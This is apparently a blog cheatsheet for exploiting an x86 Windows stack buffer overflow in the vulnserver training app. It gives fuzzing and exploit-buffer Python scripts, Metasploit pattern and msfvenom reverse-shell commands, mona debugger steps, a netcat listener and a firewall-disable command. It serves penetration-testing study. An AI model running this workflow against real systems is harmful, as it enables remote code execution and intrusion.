x86 Windows Remote Buffer Overflow Cheatsheet
Prerequisites⌗
- Windows VM
- Immunity Debugger
- PATH contains
C:\python27
C:\python27\Pycommands\mona.py
- Linux VM
- Kali, Parrot, custom build
- Both VMs need to contact each other
- A will to live
Windows VM⌗
- Launch Immunity Debugger as Administrator
- File > Open >
vulnserver.exe
- Set it to run
- Repeat after every crash
Linux VM⌗
Scan the victim IP
nmap -p- <ip>
Connect to the port where the app listens on
nc <ip> <port>
Spiking⌗
- Look for commands that can take input like:
- STATS
- TRUN
- …
- STATS
- Create spike script for every command
s_readline();
s_string("<cmd> ");
s_string_variable("A");
- Spike it and keep an eye on Immunity Debugger
generic_send_tcp <ip> <port> <spike script> 0 0
- Note the command and potential arguments where the script crashes the app
Fuzzing⌗
- On every crash, try higher increments in buffer size to see if you can overwrite EIP
- Keep an eye on Immunity Debugger
#!/usr/bin/env python3
import sys, socket
from time import sleep
ip='<ip>'
port=<port>
buffersize_incr=100
buffer=b'A'*buffersize_incr
while True:
try:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.settimeout(5) # 5 seconds
s.connect((ip, port)) # Note the double ()
s.send(b'<cmd> ./:/'+buffer)
s.recv(1024) # Important, otherwise it won't crash
s.close()
sleep(1) # Don't forget to sleep, otherwise crash when sending to fast
buffer=buffer+b'A'*buffersize_incr
except:
print('Crashed at {} bytes'.format(str(len(buffer))))
sys.exit()
Finding offset⌗
- Input the buffer size that also overwrites the EIP
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <buffer size>
- Put the output of
pattern_create.rb
in the buffer
...
buffer=b'<pattern>'
...
- Take note of the EIP value in Immunity Debugger
- Get the exact offset
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l <buffer size> -q <EIP>
- Verify by using buffer
b'A'*<offset>+b'B'*4
- EIP should be 42424242
Bad chars⌗
- In Immunity Debugger:
!mona config -set workingfolder c:\mona\%p
!mona bytearray -b "\x00"
- Use below code to generate string of bad chars that is identical to bytearray
#!/usr/bin/env python3
from __future__ import print_function
for x in range(1, 256):
print("\\x" + "{:02x}".format(x), end='')
print()
- Put the string of bad chars before the B’s in your buffer:
badchars = "\x01\x02\x03\x04\x05...\xfb\xfc\xfd\xfe\xff"
buffer = b'A'*<offset>+b'B'*4+badchars
- Crash the app with the badchars and compare with mona:
- Copy ESP each time you crash it because it may change
!mona compare -f C:\mona\<appname>\bytearray.bin -a <ESP>
- Generate new bytearray, exclude badchars and start over:
!mona bytearray -b "\x00\x0a"
- Delete badchars from buffer
- Crash app and copy ESP again
!mona compare -f C:\mona\<appname>\bytearray.bin -a <ESP>
Find right module⌗
- Find module without protections (False):
!mona modules
- Take note of the module name (e.g. essfunc.dll)
- Find JMP ESP
!mona jmp -r esp -cpb "<badchars"
- OR
!mona find -s "\xff\xe4" -m <module>
- Take note of ALL the return addresses for all JMP ESP pointers
buffer=b"A"*<offset>+b"<JMP ESP return address>"
- 0x625011AF => \xaf\x11\x50\62
- In Immunity Debugger: set breakpoint on the JMP ESP return address (Go to address is disassembler:
and press F2) - Crash the app again
- EIP should now have the JMP ESP return address
- If not, try again with other JMP ESP return addresses
Shellcode⌗
msfvenom -l payload
msfvenom \
-p <payload> \
LHOST=<attacker ip> \
LPORT=<attacker port> \
EXITFUNC=thread \
-f c \
-a x86 \
-b "<bad chars>"
NOTE: If an encoder was used (more than likely if bad chars are present, remember to prepend at least 16 NOPs (\x90) to the payload.)
#!/usr/bin/env python3
prefix = b""
offset = <offset>
overflow = b"A"*offset
returnaddr = b"<JMP ESP addr>"
padding = b"" # NOPs (e.g. \x90\x90\x90)
payload = b"<msfvenom output>"
postfix = b""
buffer = prefix + overflow + returnaddr + padding + payload + postfix
...
sudo ufw disable
nc -lvnp <attacker port>
Finally, crash the app again and get shell :)
Resources⌗
- https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst
- https://www.youtube.com/watch?v=qSnPayW6F7U&list=PLLKT__MCUeix3O0DPbmuaRuR_4Hxo4m3G
- https://tryhackme.com/room/bufferoverflowprep
- https://medium.com/@Z3R0th/a-simple-buffer-overflow-using-vulnserver-86b011eb673b
Read other posts